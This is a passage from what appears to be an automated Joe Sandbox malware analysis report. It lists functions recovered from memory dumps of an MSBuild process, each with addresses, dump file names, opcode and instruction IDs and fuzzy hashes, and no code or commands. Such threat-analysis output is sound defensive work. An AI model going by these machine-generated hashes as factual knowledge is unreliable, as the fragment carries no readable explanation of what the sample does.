                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d54e4c6aed35fa19866582088de9591ac24621188124ff9d78617c683deb9099
                                                                                                                                                                                                                                                • Instruction ID: 874b2e032156ebfd841999484bfbeac26dd78d57cbf1b1904af32d48c6393e2a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d54e4c6aed35fa19866582088de9591ac24621188124ff9d78617c683deb9099
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64F0B47030021AAFC618E7A9E4509AEB3D7EBC96203104528D00ACB740EF30ED0B8BE5
                                                                                                                                                                                                                                                Function 071B001E Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9ac8dfe5f62e198d51f8afbaafc6198eb6ecabdb5515a2c1f0353389248f2a95
                                                                                                                                                                                                                                                • Instruction ID: 247239ef5e0162db5aadaa4a19273513c68282dc3d2fc058f0dfc7b11ae44598
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ac8dfe5f62e198d51f8afbaafc6198eb6ecabdb5515a2c1f0353389248f2a95
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5F0B432619384AFC7228B68DC94D9B7F75DF87210B1844ABF554C7152D2349924C7B7
                                                                                                                                                                                                                                                Function 0709E62A Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e560432edcc375a89b7c6d049d3ba26f1250608034b97e5bf42af81b36cb2add
                                                                                                                                                                                                                                                • Instruction ID: 5b422f731cd40128797917ed220f9d6ed1d9b0eb74cc5bb3e32698d3e607b815
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e560432edcc375a89b7c6d049d3ba26f1250608034b97e5bf42af81b36cb2add
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04F06D72214702CFCF21CF21C440962FBF6BF81654B148A79E04187511DBB1F845EB91
                                                                                                                                                                                                                                                Function 071BFE30 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9074a0168d59961b2b04378cd0be84949f2a890527dd99b6d9855c68a5f26e6c
                                                                                                                                                                                                                                                • Instruction ID: 8a6eb5c765bcdf0ffd8a56a87a9af0bf48997a0c9ee81d998bac6605094b6ee2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9074a0168d59961b2b04378cd0be84949f2a890527dd99b6d9855c68a5f26e6c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85F02772B0426A5BCB22D6ADAC019FFBBECAB84260F09412AE504D3181E7709815C3A2
                                                                                                                                                                                                                                                Function 072ABD2A Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: fefbcb881f52797500c966db7878da29198f0e43ad2e29f5373fd28bc6b2e802
                                                                                                                                                                                                                                                • Instruction ID: cfab7b3d41967988f7372558001e686b1adc4ca66a25dd425a57415f175d4d1a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fefbcb881f52797500c966db7878da29198f0e43ad2e29f5373fd28bc6b2e802
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4CE055F6328345AF8B190A9928805B73FA8DA8226030401EFE401C7193C9098808C3B1
                                                                                                                                                                                                                                                Function 072AAC80 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f3ce84663516b5e5693b0a56953cd2a344536ad41690ddfa2090b4409edbaf40
                                                                                                                                                                                                                                                • Instruction ID: 60fd23ce22ab5011765be1710fee6fe8a6cf74a6ee725eb3876587c1c338aa44
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3ce84663516b5e5693b0a56953cd2a344536ad41690ddfa2090b4409edbaf40
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1E06DBA15D3949FC7025B28F9098E07FB89E4A62131540C3F048CF273C610ED8496A2
                                                                                                                                                                                                                                                Function 072ABCD0 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6a456e0e5c3ed4760df2f1b9111baea6b23f083fe7de2782110a8fe211bdcacd
                                                                                                                                                                                                                                                • Instruction ID: 1c1bf8a8017a5f4526d45b2b2b7fd4e5cd2462f34b4d99f1abda8df7bfaed6d8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a456e0e5c3ed4760df2f1b9111baea6b23f083fe7de2782110a8fe211bdcacd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FF05E763002109F8618E739D89085AB3E6FF882613500779E10ACB791EF24EC04CBD1
                                                                                                                                                                                                                                                Function 072AFC30 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0acb5b568cf9efb3741f9c7d95e42a617064595c6df7fa043323a096d8e69039
                                                                                                                                                                                                                                                • Instruction ID: d96346bf4df5e98b2707687ea9269b234f258b831793d8391dcfa81835e13cdc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0acb5b568cf9efb3741f9c7d95e42a617064595c6df7fa043323a096d8e69039
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA01317090031EDBEB10FF66F9859D933F9F740224B208791D40887218EB71BE059F95
                                                                                                                                                                                                                                                Function 07092008 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 106fac14a5d61ddb6d18d213948f6ab3163d4588b848795e36e11e3dec338e9e
                                                                                                                                                                                                                                                • Instruction ID: 02be5b232a409c876cf7da14d2ad540b542236ff717b36428690bd9834ea047c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 106fac14a5d61ddb6d18d213948f6ab3163d4588b848795e36e11e3dec338e9e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AF0BE75E08248DFCB40DFE8D8904ADBBB1FBCA311F148199D259DB355D731A906DB80
                                                                                                                                                                                                                                                Function 0711CCE8 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3f5eeff4198ed225c0027f0e3ed03816c0927dc833eb9f9fc710e85c310e1409
                                                                                                                                                                                                                                                • Instruction ID: c093e650f6bec2414815513ed10eff6c781be673b81058929ed302ff4c670476
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f5eeff4198ed225c0027f0e3ed03816c0927dc833eb9f9fc710e85c310e1409
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FE022B6648BB60EDB331AAC20003A2BFD54B82160F0C89BAC4CA8A9C1C252D40887E1
                                                                                                                                                                                                                                                Function 07091762 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 37fb7c92876fbb9fc4b4b3077bb7a0a78f86bcc62cf33a524f63f078fc3ae3d4
                                                                                                                                                                                                                                                • Instruction ID: bae29f52c442ce03e9b10be8a2578ab906755ed3b74a3b34de0f6fae7df6843f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37fb7c92876fbb9fc4b4b3077bb7a0a78f86bcc62cf33a524f63f078fc3ae3d4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32F05870E05348AFCB40DFA8D845A9ABBF4EB49300F1481EAE81897281C6329A01DB91
                                                                                                                                                                                                                                                Function 072A49C8 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c88082d943afc1b23794ea14052aad0fdb795c03549090ab4187bf990a714c12
                                                                                                                                                                                                                                                • Instruction ID: 3803ce9e83b269bfe79f4ccd51c13bada6d6c7284b38adf8f453e341fbeec900
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c88082d943afc1b23794ea14052aad0fdb795c03549090ab4187bf990a714c12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0E02B372092807FC7125A7078108EB7F2BAFC623030D419BF5808B101C6216944D3A1
                                                                                                                                                                                                                                                Function 071BDDA8 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 560dbb31727ed4782a0f1e6e01771ae3ec92153a26372127ed1388931235c9e2
                                                                                                                                                                                                                                                • Instruction ID: 73c5a7bdbbfefba2db59709a7223c5ccb1757f7f447eccd6152a2af3ca15d01a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 560dbb31727ed4782a0f1e6e01771ae3ec92153a26372127ed1388931235c9e2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AE022F53081029BCB29DB18F1409A13FD8AF09210B4202A2D888CB2C2DB68E880CBF1
                                                                                                                                                                                                                                                Function 07091479 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 01885378909a110f21a445157601f3b300219715f331c33eb301753d95c5115e
                                                                                                                                                                                                                                                • Instruction ID: 24a55ae870a89ef8ab9174a368d1678b01d20c499db8b8b5b25c4d68b81c45dd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 01885378909a110f21a445157601f3b300219715f331c33eb301753d95c5115e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1F0A030905348BFC741DF64D841A9ABFB4AB06250F1441EAE808D7282D6329E15C792
                                                                                                                                                                                                                                                Function 072ACE50 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 064d43e926be5e6966b8fa3c2b4a9f3a5bf5b75815d50b85b4186cc0b40a5993
                                                                                                                                                                                                                                                • Instruction ID: ddaea76af85cbb248207620b11a8825aa268b94b71d0203ee59b7706916f60ae
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 064d43e926be5e6966b8fa3c2b4a9f3a5bf5b75815d50b85b4186cc0b40a5993
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DE0D8777002805BC715123598156F97FABEBC91527044036DD05C6310EE78AC0287E1
                                                                                                                                                                                                                                                Function 07118738 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2c0421edff750cdb348fe2f58769cf4b8b5aa41a89a2fba994356ca6b423faeb
                                                                                                                                                                                                                                                • Instruction ID: 564c7e1a01c1ccce7445f4620f60e6753c95d2ce22d0c33806fb400a9ee711ad
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c0421edff750cdb348fe2f58769cf4b8b5aa41a89a2fba994356ca6b423faeb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3E06D76204626DF9315CA5DD884816B7AAFB847643108135E808CB200C731E841CB90
                                                                                                                                                                                                                                                Function 071BFEB8 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8e49ba3b6a1c5e4ea44e00b25247e1197970706b31393fef0970eebc3853205f
                                                                                                                                                                                                                                                • Instruction ID: 5cebfed5e35be0807279b44090198096e5e60e25a70277f7dc6fb0d07d6957eb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e49ba3b6a1c5e4ea44e00b25247e1197970706b31393fef0970eebc3853205f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73E03974A042589FCB41DBA8A444698BFF0EB45211F2441ABC948D3256D7328E02DB90
                                                                                                                                                                                                                                                Function 071B8B30 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4fe05a90e47e5076b47df257d44211081b72359344146a9c0c8e00be2553616b
                                                                                                                                                                                                                                                • Instruction ID: a8f7542dee71a05ece66efa02f0cae26daf3c274f9d35dd72290861dee7e6e15
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4fe05a90e47e5076b47df257d44211081b72359344146a9c0c8e00be2553616b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1E02631705300AB97155A5ABC8A5677E9FFBC9624704403FFD0AC3300DF649C0186E1
                                                                                                                                                                                                                                                Function 070925C1 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 59021fb44aca477f8619f38e80aad051fddb005e5d1275f5a6d3bf52aed37eb4
                                                                                                                                                                                                                                                • Instruction ID: 07e433fbe998f3cc3e9cccc1eb0ee5b430e30559b39bcc9f6dbf36c87e1fa781
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59021fb44aca477f8619f38e80aad051fddb005e5d1275f5a6d3bf52aed37eb4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27E0223120A2AB6FCB06B768F8108DE7FB1EF8112170501E3D044CB083CB24490E83E2
                                                                                                                                                                                                                                                Function 072ACE60 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4b423a022fd928d605a925b3ca2c64ec87da203b697d791173b692f7aa000525
                                                                                                                                                                                                                                                • Instruction ID: e9e8c71c092d112ea85fb6887ca80893febe39082c853e9096239f0f1c09d5d3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b423a022fd928d605a925b3ca2c64ec87da203b697d791173b692f7aa000525
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1E04F3B7001504B87145279A4141BD7BEBEBC86627144036EE09C2300EE759C4297A0
                                                                                                                                                                                                                                                Function 072AD1E0 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 34bdc6885fbd33285b598437803e0e2c2a7490f2c2a578d8316454c0e859fbd3
                                                                                                                                                                                                                                                • Instruction ID: 9ac636e37245fd431a498b952e8cc8234f1d92d16562c6dc4aa799e91b8a913a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34bdc6885fbd33285b598437803e0e2c2a7490f2c2a578d8316454c0e859fbd3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EBE0D81262EAE05FC303976CAC302D9BF71AF8756430A41D7C4E4DB1A3E51C5C5583E2
                                                                                                                                                                                                                                                Function 0711B228 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3dceefe216f1564a826977867c41a34268c524026a4ab94414b40e52563098ac
                                                                                                                                                                                                                                                • Instruction ID: a1c87523e005f5f21c072acc8cb2c8b925e0851a78b4350b57b230a75935a8ee
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3dceefe216f1564a826977867c41a34268c524026a4ab94414b40e52563098ac
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FEE04F763001149BC7109A4EE444D9ABBAEEBD97717048077FA09CB360CA71EC5286A4
                                                                                                                                                                                                                                                Function 07096878 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 274f15486e893891d746959ec75dd0cb5980164e9ee145216df7797a87205557
                                                                                                                                                                                                                                                • Instruction ID: 97122e351de7f5a7175b2fd476aa2ba7aeade22b71ee550e6dd57724c3225ffe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 274f15486e893891d746959ec75dd0cb5980164e9ee145216df7797a87205557
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4F01570E0934CAFCB05EBA8D85458CBFB1AF45200F0084EAD484E7352EA345A15CF82
                                                                                                                                                                                                                                                Function 071BED72 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 652b9fe8c9930433ddbf8811e09f674324333c3e7384c0a61a179567f5c5d46b
                                                                                                                                                                                                                                                • Instruction ID: af93ff77d1b6849e5be66844a3468f445441d1ea96384c9f201080d9951cd252
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 652b9fe8c9930433ddbf8811e09f674324333c3e7384c0a61a179567f5c5d46b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9E0D8F5610234AFC604E765D8505D93795AF88120B0147DAD9495F395CE60EC068BC7
                                                                                                                                                                                                                                                Function 0709EEF0 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
